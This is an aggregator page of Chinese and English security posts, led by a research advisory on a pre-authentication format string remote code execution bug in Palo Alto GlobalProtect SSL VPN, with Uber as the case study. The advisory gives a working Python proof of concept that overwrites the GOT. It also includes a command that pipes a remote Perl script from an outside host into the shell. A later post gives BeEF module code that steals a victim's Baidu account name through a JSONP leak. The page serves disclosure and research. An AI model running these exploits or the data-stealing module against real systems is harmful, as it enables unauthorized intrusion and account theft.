Aggregator
2018 Application Protection Report Podcast Series
Palo Alto GlobalProtect 資安通報
在我們進行紅隊演練的過程中,發現目標使用的 Palo Alto GlobalProtect 存在 format string 弱點,透過此弱點可控制該 SSL VPN 伺服器,並藉此進入企業內網。
回報原廠後,得知這是個已知弱點並且已經 silent-fix 了,所以並未有 CVE 編號。經過我們分析,存在風險的版本如下,建議用戶儘速更新至最新版以避免遭受攻擊。
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
9.x 和 7.0.x 並沒有存在風險。
細節我們也利用了這個弱點成功控制了 Uber 的 VPN 伺服器,詳細的技術細節請參閱我們的 Advisory: https://devco.re/blog/2019/07/17/attacking-ssl-vpn-part-1-PreAuth-RCE-on-Palo-Alto-GlobalProtect-with-Uber-as-case-study/
附註這將會是我們 SSL VPN 研究的系列文,預計會有三篇。這也是我們研究團隊今年在 Black Hat USA 和 DEFCON 的演講『 Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs 』中的一小部分,敬請期待!
Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!
Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)
SSL VPNs protect corporate assets from Internet exposure, but what if SSL VPNs themselves are vulnerable? They’re exposed to the Internet, trusted to reliably guard the only way to your intranet. Once the SSL VPN server is compromised, attackers can infiltrate your Intranet and even take over all users connecting to the SSL VPN server! Due to its importance, in the past several months, we started a new research on the security of leading SSL VPN products.
We plan to publish our results on 3 articles. We put this as the first one because we think this is an interesting story and is very suitable as an appetizer of our Black Hat USA and DEFCON talk:
- Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs!
Don’t worry about the spoilers, this story is not included in our BHUSA/DEFCON talks.
In our incoming presentations, we will provide more hard-core exploitations and crazy bugs chains to hack into your SSL VPN. From how we jailbreak the appliance and what attack vectors we are focusing on. We will also demonstrate gaining root shell from the only exposed HTTPS port, covertly weaponizing the server against their owner, and abusing a hidden feature to take over all VPN clients! So please look forward to it ;)
The storyIn this article, we would like to talk about the vulnerability on Palo Alto SSL VPN. Palo Alto calls their SSL VPN product line as GlobalProtect. You can easily identify the GlobalPortect service via the 302 redirection to /global-protect/login.esp on web root!
About the vulnerability, we accidentally discovered it during our Red Team assessment services. At first, we thought this is a 0day. However, we failed reproducing on the remote server which is the latest version of GlobalProtect. So we began to suspect if this is a known vulnerability.
We searched all over the Internet, but we could not find anything. There is no public RCE exploit before[1], no official advisory contains anything similar and no CVE. So we believe this must be a silent-fix 1-day!
[1] There are some exploit about the Pan-OS management interface before such as the CVE-2017-15944 and the excellent Troppers16 paper by @_fel1x, but unfortunately, they are not talking about the GlobalProtect and the management interface is only exposed to the LAN port
The bugThe bug is very straightforward. It is just a simple format string vulnerability with no authentication required! The sslmgr is the SSL gateway handling the SSL handshake between the server and clients. The daemon is exposed by the Nginx reverse proxy and can be touched via the path /sslmgr.
$ curl https://global-protect/sslmgr <?xml version="1.0" encoding="UTF-8" ?> <clientcert-response> <status>error</status> <msg>Invalid parameters</msg> </clientcert-response>During the parameter extraction, the daemon searches the string scep-profile-name and pass its value as the snprintf format to fill in the buffer. That leads to the format string attack. You can just crash the service with %n!
POST /sslmgr HTTP/1.1 Host: global-protect Content-Length: 36 scep-profile-name=%n%n%n%n%n... Affect versionsAccording to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:
- Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
- Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
- Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3
The series 9.x and 7.0.x are not affected by this vulnerability.
How to verify the bugAlthough we know where the bug is, to verify the vulnerability is still not easy. There is no output for this format string so that we can’t obtain any address-leak to verify the bug. And to crash the service is never our first choice[1]. In order to avoid crashes, we need to find a way to verify the vulnerability elegantly!
By reading the snprintf manual, we choose the %c as our gadget! When there is a number before the format, such as %9999999c, the snprintf repeats the corresponding times internally. We observe the response time of large repeat number to verify this vulnerability!
$ time curl -s -d 'scep-profile-name=%9999999c' https://global-protect/sslmgr >/dev/null real 0m1.721s user 0m0.037s sys 0m0.005s $ time curl -s -d 'scep-profile-name=%99999999c' https://global-protect/sslmgr >/dev/null real 0m2.051s user 0m0.035s sys 0m0.012s $ time curl -s -d 'scep-profile-name=%999999999c' https://global-protect/sslmgr >/dev/null real 0m5.324s user 0m0.021s sys 0m0.018sAs you can see, the response time increases along with the number of %c. So, from the time difference, we can identify the vulnerable SSL VPN elegantly!
[1] Although there is a watchdog monitoring the sslmgr daemon, it’s still improper to crash a service!
The exploitationOnce we can verify the bug, the exploitation is easy. To exploit the binary successfully, we need to determine the detail version first. We can distinguish by the Last-Modified header, such as the /global-protect/portal/css/login.css from 8.x version and the /images/logo_pan_158.gif from 7.x version!
$ curl -s -I https://sslvpn/global-protect/portal/css/login.css | grep Last-Modified Last-Modified: Sun, 10 Sep 2017 16:48:23 GMTWith a specified version, we can write our own exploit now. We simply modified the pointer of strlen on the Global Offset Table(GOT) to the Procedure Linkage Table(PLT) of system. Here is the PoC:
#!/usr/bin/python import requests from pwn import * url = "https://sslvpn/sslmgr" cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt" strlen_GOT = 0x667788 # change me system_plt = 0x445566 # change me fmt = '%70$n' fmt += '%' + str((system_plt>>16)&0xff) + 'c' fmt += '%32$hn' fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c' fmt += '%24$hn' for i in range(40,60): fmt += '%'+str(i)+'$p' data = "scep-profile-name=" data += p32(strlen_GOT)[:-1] data += "&appauthcookie=" data += p32(strlen_GOT+2)[:-1] data += "&host-id=" data += p32(strlen_GOT+4)[:-1] data += "&user-email=" data += fmt data += "&appauthcookie=" data += cmd r = requests.post(url, data=data)Once the modification is done, the sslmgr becomes our webshell and we can execute commands via:
$ curl -d 'scep-profile-name=curl orange.tw/bc.pl | perl -' https://global-protect/sslmgrWe have reported this bug to Palo Alto via the report form. However, we got the following reply:
Hello Orange,
Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know.
Kind regards
Hmmm, so it seems this vulnerability is known for Palo Alto, but not ready for the world!
The case studyAfter we awared this is not a 0day, we surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them! From our survey, Uber owns about 22 servers running the GlobalProtect around the world, here we take vpn.awscorp.uberinternal.com as an example!
From the domain name, we guess Uber uses the BYOL from AWS Marketplace. From the login page, it seems Uber uses the 8.x version, and we can target the possible target version from the supported version list on the Marketplace overview page:
- 8.0.3
- 8.0.6
- 8.0.8
- 8.0.9
- 8.1.0
Finally, we figured out the version, it’s 8.0.6 and we got the shell back!
Uber took a very quick response and right step to fix the vulnerability and Uber gave us a detail explanation to the bounty decision:
Hey @orange — we wanted to provide a little more context on the decision for this bounty. During our internal investigation, we found that the Palo Alto SSL VPN is not the same as the primary VPN which is used by the majority of our employees.
Additionally, we hosted the Palo Alto SSL VPN in AWS as opposed to our core infrastructure; as such, this would not have been able to access any of our internal infrastructure or core services. For these reasons, we determined that while it was an unauthenticated RCE, the overall impact and positional advantage of this was low. Thanks again for an awesome report!
It’s a fair decision. It’s always a great time communicating with Uber and report to their bug bounty program. We don’t care about the bounty that much, because we enjoy the whole research process and feeding back to the security community! Nothing can be better than this!
AI与安全「2」:Attack AI(2)破坏模型完整性——逃逸攻击
The problems with patching
Cobalt Strike几种不那么常见的上线方式小记
AI与安全「2」:Attack AI(1)总述
The Hunt for IoT: The Opportunity and Impact of Hacked IoT
Discuz! ML RCE漏洞 getshell 复现 - PaperPen
基于mitmproxy的JSONP漏洞辅助挖掘工具
这个工具是mitmproxy的一个扩展,启动方法为mitmdump -s ./a.py -q,关于mitmproxy
在启动之后会打开一个本地8080上的HTTP代理,将浏览器的代理设置为http://127.0.0.1:8080并信任证书就可以使用了。该工具在发现了JSONP的HTTP Response之后会将URL和内容显示在终端。
说实话这工具写的很简陋,其实还可以加上什么检测返回结果敏感信息以及去Referer重放的,但我想反正一个站也没几个JSONP页面,不值得。
写完之后想要用这个和Burp的spider配合实现一键挖漏,但发现Burp的Spider实在不够好用,没办法覆盖全,至少我在我挖出洞的那个站点上面测试都没有成功。
运行如图:
链接:https://github.com/TomAPU/Scripts/tree/master/JsonpProxy
失落的十年,写在McAfee二次IPO之前
将挖掘出的JSONP泄漏漏洞整合进BEEF浏览器利用框架
- config.yaml : 用于描述该模块相关信息的YAML文件
- module.rb :个人理解是我们控制端的“后端”文件,用于
- command.js :发给受害者执行的payload
beef: module: baidu_account: enable: true category: "Exploits" name: "get Baidu account" description: "通过JSONP漏洞获取█度帐号名" authors: ["APU"] target: working: ["ALL"] 开头的beef:和module:是起手式,大部分模块的开头都是这个,这个意思是定义一个模块。西面这个需要和你模块的文件夹名字相同不然会出现莫名其妙的错误。enable定义这个模块是否被启用,我们当然选择true。category选择Exploits,在这里需要注意,category不能乱写,不能自己新建一个文件夹尝试新建一个category否则运行会失败或者无法添加模块,如果有人直到怎么新建category请告诉我。name就是模块的名字,description就是描述,authors是作者,这里是一个list(不是很熟悉ruby,不知道术语说对了没)应该是允许一个模块对应多个作者的,target是对应的浏览器,target的格式可以在刚才的链接里面看到我就不详细讲了
写完这个文件之后就要写module.rb了,我再贴上代码来
class Baidu_account < BeEF::Core::Command # This method will be called when BeEF will receive an answer from the hooked browser def post_execute content = {} content['Baidu_account'] = @datastore['Baidu_account'] save content end end 在这里我们需要定义一个类,用于后端的处理。类中可以定义三个函数,self.options,pre_send,post_execute。即参数,发送前的准备,发送后的准备。类名虽然没有具体规范,但是我看到的插件都是把文件夹名字大写作为类名。由于我这里jsonp漏洞利用主要是需要在利用之后接收参数,所以只定义post_execute。
对于BEEF,想要接收受害者上传的参数应该使用@datastore,这个@datastore储存了受害机发上来的数据,至于是怎么发的我们先不用关心,只需要知道它能从这里面取参数就可以了。取到了参数我们还需要储存,因此我们需要使用save 来储存参数。我代码中储存数据的语句是save content。这个content是之前定义的一个字典,用于接收上传的参数的
最后我们需要做的就是写我们的核心command.js了,我这里把打了码的command.js发上来
function getbaiduaccount(data) { username=data['username']; beef.net.send("<%= @command_url %>", <%= @command_id %>, "Baidu_account="+username); } beef.execute(function() { beef.dom.loadScript("█度神秘JSONP接口"); }); BEEF官方声称我们必须把payload放在beef.execute函数内来执行,但是我在这个函数之外定义callback函数也是ok的。BEEF官方提供了许多函数来支持我们的各种操作,唯一的问题就是他们的迫真文档只列出了名字,功能我们得自己猜。不过我这里蛮幸运的,用Chrome的调试一找就找到了这里的loadScript函数,这样就能用这个函数加载JSONP的接口。在callback函数中,我们需要把辛辛苦苦拿到的数据传回去,这里就要用到beef.net.send函数了
这个函数是这么调用的beef.net.send("<%= @command_url %>", <%= @command_id %>, "data");其中data就是我们要传回去的东西,其中data是个字符串,传输的数据格式跟平时URL传参没啥区别,就是“参数名1=值1&参数名2=值2....”
最后要说的坑就是首先每次打开BEEF的时候BEEF应该已经加载完了插件,你再修改也不会变除非重启BEEF。这个困扰了我很久,之前我一直调试不对,后来才发现其实不重启程序根本没有变化。还有就是之前我模块命名不规范,瞎搞了一会删掉之后WEB端还显示那个模块,那是因为/usr/share/beef-xss/db/beef.db有缓存,需要删掉才能刷新
0x02 展示图片
0x03最后再指点江山几句 最近发现一大堆人都喜欢造什么漏洞利用框架,每个界面都花里胡哨的,仔细一看无非就是调用python脚本去扫描别人统一管理,实际上并不实用。本人以为成功的漏洞利用框架首先是得研究的早,比如metasploit就抢占了先机,算是最先搞漏洞利用框架的几个,现在就发展的很好。还有就是框架之所以叫做框架除了暗示这些利用能被统一管理之外,还需要能够给模块编写者提供一些支持,帮助模块开发者完成一些重复琐碎的事项,减少模块编写者的工作量,不然只能算个漏洞利用集合不算优秀的框架。那些优秀的框架,比如metasploit的shellcode统一管理就很好,从此写二进制EXP的人就能减少很多编shellcode的工作量,进而把核心放在漏洞上。再比如今天看见的BEEF框架就能够很轻松地解决数据回传问题,不需要像https://lcx.cc/post/4595/里面从头开始写个专门收数据的后端。希望这个也能给想要编写XX框架的人一些思考
WCTF2019 pdoor Review
这里提供官方的题目 https://github.com/paul-axe/ctf
今年 WCTF 还是被按在地上摩擦,就 pdoor 这个题目来说,感觉是相当值得多思考几遍